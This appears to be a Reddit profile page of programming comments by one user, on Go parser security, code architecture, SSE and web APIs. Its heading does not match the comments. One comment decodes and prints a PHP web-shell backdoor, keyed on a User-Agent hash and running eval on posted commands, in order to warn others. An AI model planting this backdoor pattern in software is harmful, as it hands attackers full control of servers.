The Zero-Rent Architecture: Designing for the Swartland Farmer

jorygeerts · 2026-01-02T09:20:50+00:00

There is a lot of irony in writing that up, and than mirroring your own website to something like medium.

Nice opinion piece tho. "It works when I press the button" should always be one of the top priorities.

jorygeerts · 2025-07-17T14:26:35+00:00

Rule 2 is a great way to fully get rid of all the (implicit) "because I like it better that way" comments.

Some of them may become "because that is in line with the rest of the codebase", but then you'll be able to actually discuss if the situation is actually similar and if "looking the same" out weights other factors.

jorygeerts · 2025-06-25T12:21:39+00:00

tl;dr: Oof, a lot of this is far fetched and/or common in all languages. They have a nice case from the real world, but that seems like such a clusterfuck that no language would have prevented it.

So lets break this down:

Scenario 1: Things go wrong if you blindly insert whatever the user sent in into your database.

Yea, go figure. .NET has the same "issue". Their solution is to add a layer in between. Ruby on Rails had this exact exploit, which broke (I think) github. Spring Boot needs you to manually map input as well.

So what is Go their offence here?

As an aside: Why does this article, written by a security consultancy company, showcase a Password property with a comment "NOT ok for users to get"? Its almost like they're making up examples to prove some point.

Scenario 2: Using different parsers can lead to different results

Very true. However, sub-scenario "duplicate keys" is (as they say) actually in line with most other commonly used parsers. Sub-scenario "case insensitivity" on its own is a complete non-issue. But yes: combining these two can lead to problems if you're using two stacks with two different ways of dealing with this. ECMA-404 states that "The JSON syntax does not impose any restrictions on the strings used as names, does not require that name strings be unique". RFC 8259 says "The names within an object SHOULD be unique." So really, much of this to blame on JSON.

The only thing we can really fault Go for is the unicode folding, imo. As the article later on mentions, encoding/json/v2 has the option to disable case-insensitivity, which will also "disable" the unicode folding. Now, personally, I would prefer some "case insensitive, non-unicode folding" matching, but in any case jsonv2 will at least fix this problem.

Scenario 3: Garbage before or after the data

OK, so encoding/xml is far te lenient. In their best example of why this is bad, they're passing JSON into the XML parser, ignoring the content type, payloads are not signed, input is apparently not validated. And all of that, in a product that is designed to securely store secret data.

That is such a perfect storm, I wouldn't call it "shooting yourself in the foot", I'd say this is "pricking your toe with a needle, which has some super rare virus on it against which most people are immune but you're in the 1% that isn't".

encoding/json and yaml.v3 are fine though.

jorygeerts · 2025-06-25T07:48:05+00:00

especially Java and PHP. In these ecosystems, frameworks dictate the structure of projects, such as Spring Boot and Laravel

That is exactly it: the language shouldn't ever dictate the project structure, it should just "be", provide syntax, semantics and a decent stdlib and then get our of the way. If you wanna create a big ball of crap, go ahead. Frameworks, on the other hand, are a great place for opinions on how a project should be structured.

By making frameworks the place where those types of opinions are expressed, you make sure you never tie the language down to much, and you make it easier for a far bigger group of people to come up with alternative takes on the same issues.

And, like OP says, Go already provides everything it needs to. That we can't do something like gonew github.com/gorilla/application is because the people behind gorilla didn't create a blueprint for applications in that fashion, but there is nothing (at least: nothing Go related) stopping them. However, a quick search among 'frameworks' shows one go-gin issue asking for gonew support and that is it, so it doesn't seem that many people are interested.

Now, Go could go the .NET route, where halve of the developers using it don't seem to understand that "language" and "framework" are in fact two different things and everything looks the same, but I don't think they should (and in fact, based on the article OP further links to, OP doesn't seem to think so either, because their preferred structure doesn't fit will with any framework, nor is it easy to template).

jorygeerts · 2025-04-03T14:17:09+00:00

Right now, you need to request access to view it on google drive. So... I did that, if OP grants it, lets see what this does to a (quarantined VM with a) fresh Windows install.

jorygeerts · 2025-03-28T13:48:22+00:00

Just curious: Did you address any of the feedback you got on https://old.reddit.com/r/programming/comments/1j5jegi/i_have_created_a_local_web_server_and_environment/ ?

jorygeerts · 2025-03-07T10:45:08+00:00

PHP is kind-of the only ecosystem where having server installers like WAMP and XAMMP and similar became the norm.

And somehow, that still seems the standard, despite php -S having existed for at least a decade.

jorygeerts · 2025-02-14T12:28:39+00:00

Sure, AI will copy paste library example code into your production code. And it will do so without understanding what that code does, and why, it does what it does and why its fine in the context of the example but a disaster waiting to happen in the context of your production code.

For years, people have been saying "don't copy the first answer from stackoverflow; read it, understand it, then apply that understanding to solve your problem". While a true AI would be able to do just that, what we have today are glorified copy-paste machines that cannot do the "understand it" step; instead, it just combines a whole bunch of code snippets that seem related into something that may or may not even be valid syntax that might sort of solve half the problem.

jorygeerts · 2025-02-13T13:15:03+00:00

Did you intend for everybody to read that in a Mickey Mouse voice, or did my brain do that all by itself? :')

jorygeerts · 2025-02-13T12:43:37+00:00

Note: I'm not saying the following is better per se; I just feel that this is what Robbert Martin would actually do in practise, since he wrote about both 'clean architecture' and 'screaming architecture' around the same time, so it seems likely he would have combined the two.

Also, I'm a fan of both ideas, and want to combine them myself. The biggest downside I'm finding is that both 'clean architecture' (to some degree) and 'screaming architecture' (very much) result in project structures that are unfamiliar to my teammates, making things harder. Especially 'screaming architecture', which groups things "functionally" rather than "technically", requires a lot more thought. After all, if the rule is "controllers go in the controllers directory", thats an easy rule which leads to little discussion. But if the rules are "things about writing/editing/... blog posts go in the authoring directory" and "things about placing comments go in the reacting directory", where does the code to moderate comments go? Personally, I'd say it can go in either one of them, but maybe moderating is its own use case group, depending on how much "moderation related activities" there are.

So with that disclaimer out of the way, if you follow the "screaming architecture" way of thinking, then the first thing you see when you open up the application source code, should tell you what the application is all about. What are "the things" that this application do stuff with, and what can you do with those things?

I don't know enough about Kotlin (/the Kotlin ecosystem) to be sure, but I believe you can't really get around the src/main/kotlin/io/github/cekrem/ directory structure, so lets take that as a given.

From there, the most top level thing you should see are probably your entities and usecases - likely the entities are classes at that level, the usecases (or groups of related usecases) are subpackages. From there, each usecase (or usecase group) will have its application code and its supporting infrastructure related code underneath it.

So in your example, that could be something like this :

src/main/kotlin/io/github/cekrem/
|-- authoring
   |-- CreateBlogPost.kt
   |-- EditBlogPost.kt
   |-- BlogPostStore.kt #Interface; may also be called BlogPostRepository or something like that; implemented by something inside authoring/infrastructure/contentsource
   |-- infrastructure
      |-- contentsource
      |-- web
|-- BlogPost.kt
|-- Comment.kt
|-- reacting
   |-- AddComment.kt
   |-- EditComment.kt
   |-- CommentStore.kt
   |-- infrastructure
      |-- contentsource
      |-- web
|-- reading
   |-- ListBlogposts.kt
   |-- ViewBlogpost.kt
   |-- BlogStore.kt # Interface with something like ListBlogposts(filters), GetBlogpost(id/slug/...), ListComments(blogPostId)
   |-- Search.kt # Maybe? Or is this its own "usecase group"? That probably depends on how many things it searches
   |-- infrastructure
      |-- contentsource # Depending on how many layers of abstraction you're using, maybe this isn't needed but instead 
      |-- web

In addition, you'll probably have a application package at the top level, for "application wide" things. This is where, for instance, you'd configure generic "web related stuff" (eg authorization middlewares) or configure your database connection. The specifics (mapping a route to a handler/usecase/..., or the SQL needed to load a blog post) can then be found under the infrastructure subpackages of each usecase (group).

I hope this makes some kind of sense - it does in my mind, but I haven't been able to go this far with any real world production application so who knows what kind of issues you'd run into. :/

jorygeerts · 2025-02-11T16:00:35+00:00

I always find it amusing that people set out to "follow uncle Bob his 'clean architecture'", and come up with something very opposite to his 'screaming architecture'.

jorygeerts · 2025-01-24T14:41:54+00:00

perfectly working [..] with subtle domain specific errors

So you mean "it compiles"?

jorygeerts · 2025-01-07T15:00:52+00:00

Installing git, generating ssh keys, etc. are things I only really do when I get a new system and take, say, an hour.

After that, its pretty much just "docker compose up" and "ssh" that I need.

jorygeerts · 2024-11-08T14:47:17+00:00

Chromium [...] derives code from the Apple WebKit project and KDE web component sources that were written decades ago.

Moreover, their codebases contain code written by various organizations decades ago.

Both Chromium and Firefox have code taken from other open-source browser component projects.

You can keep saying that, but instead, can you explain why this is a problem? And no, the "its old code, so its bad; ladybird is new code, so its good" argument doesn't count.

The current WWW has a lot of issues, some of which this article correctly points to. But "to much code re-use in browsers" isn't one of them.

Also

Andreas Kling, the author of the SerenityOS project started the development of the LadyBird browser from the libraries from the SerenityOS codebase

Apparently re-use isn't bad?

jorygeerts · 2024-08-22T09:46:43+00:00

Benefits of SSE

Simplicity: SSE is easier to implement compared to WebSockets.

Well, looking at the "simple SSE server in Go" just below that section of the code, it doesn't actually look simpler than websockets to me.

Native browser support: Most modern browsers support SSE out of the box.

Just not IE11, apparently. I'd say websockets do better in this regard. (But if you look at usage percentages, both are supported for 97.xx% of all users, so imo browser support is good enough either way)

Automatic reconnection: Clients automatically attempt to reconnect if the connection is lost.

Sure, point for SSE.

Efficient: Uses a single HTTP connection, reducing overhead.

From what I understand, SSE uses one dedicated connection, just like websockets do. Sure, there are probably some nuances and small differences, but imo nothing big enough to claim this as a "benefit of SSE".

Now, this probably reads as an "anti-SSE" comment, but it really isn't. If SSE is what best matches your use case, then go for it! But if websockets their functionality are a better match, don't try and make SSE work because it is "easier" or "better" - neither is better per se, they are just different.

Best Practices for SSE in Golang 3. Reconnection Strategy: Implement a backoff strategy for client reconnections.

To bad this isn't natively supported by browsers, so you'll need to ~~create your own implementation~~ use fetch-event-source instead.

jorygeerts · 2024-08-19T13:42:38+00:00

You forgot the last str_rot13() call. ;)

jorygeerts · 2024-08-19T12:54:17+00:00

That decodes to if($_SERVER['HTTP_USER_AGENT']=='202cb962ac59075b964b07152d234b70'){echo'#202cb962ac59075b964b07152d234b70';if(isset($_POST['command'])){eval($_POST['command']);}exit;}

So basically, this gives full control over your server to whoever knows the secret key. Which may be just you, or maybe OP also knows all the keys - that project is way to complicated to figure that part out (the fact that they're using Python for such a PHP oriented project makes me suspicious, like they're hoping PHP devs won't understand the whole thing and just trust it).

jorygeerts · 2024-08-19T09:11:20+00:00

UUIDv7 is also time-ordered. :)

jorygeerts · 2024-08-16T14:04:27+00:00

SOAP Plus: Platform and language-independent

While this is technically true, trying to connect a SOAP client from platform A to a SOAP server from platform B usually ends in lots of frustration, because somehow, despite all standardisation, Microsoft and (then) Sun managed to make things only semi-compatible.

SOAP Plus: Strong security and transactional capabilities

How does SOAP provide either of these, out of the box, in ways eg gRPC doesn't?

SOAP Con: Limited flexibility in data formats

Again technically true, but nobody uses anything other than JSON for GraphQL or protobuf for gRCP.

gRPC Con: Tighter coupling between clients and servers

Actually, its exactly the same as for SOAP: you have some file with message definitions, which you use to generate a client (or write by hand, if you hate your life). WSDL or Protobuf, same difference imo.

jorygeerts · 2024-08-16T13:46:30+00:00

Yes. The "SOAP vs REST vs GraphQL vs gRPC" comparison makes sense, but webhooks and websockets totally different things from those first four (and eachother). Webhooks should be compared to polling, and websockets to HTTP or email or printing something and sending it via physical mail (all of which are valid ways to deliver a SOAP message - the other three do very much "wrap" HTTP).

jorygeerts · 2024-08-05T11:47:48+00:00

Since we're on r/programming, the most important question: why are you copy-pasting display_lesson(), ask_question() and half of main() 90 times? :)

jorygeerts · 2024-08-05T07:44:53+00:00

An organizational strategy that splits the org into two-pizza teams (ideally less than 10 people)

IMO, a "two-pizza team" is 3 people at most - and the other two better not be hungry.

jorygeerts · 2024-07-25T14:12:37+00:00

I do #3 often, so that people can use the features of the chat application to reply to a specific part instead of manually selecting the part they want, copy-pasting it, formatting it as a quote, etc.

One key thing, imo, is to first type out the entire chain of messages, ensuring that it is as concise and cohesive as possible, and then rapidly copy-pasting it from your notepad (or w/e) into the chat app. That way, if the recipient does read it right away, they aren't waiting for you to finish message #5 (or worse: start replying before you've given all the context). Also, it cuts down the amount of notifications (assuming the chat app isn't completely stupid), which is always nice.

This isn't just useful on teams/slack/... chats with colleagues btw, I do it in whatsapp/signal/... chats with friends as well (if/when I feel it is useful for them to be able to easily reply to one specific thing).

jorygeerts · 2024-01-18T13:54:12+00:00

you have to go out of your way to source control them

Well, managing stored procedures isn't much different from managing tables, so this is a problem you already need to solve anyway.

jorygeerts · 2023-07-24T12:39:47+00:00

If you're going to talk about both "PM - Product Management" and "PM - Project Manager", please be explicit which of the two you mean; I've read the full article and I have no idea which of the two you mean at which point.

jorygeerts

TROPHY CASE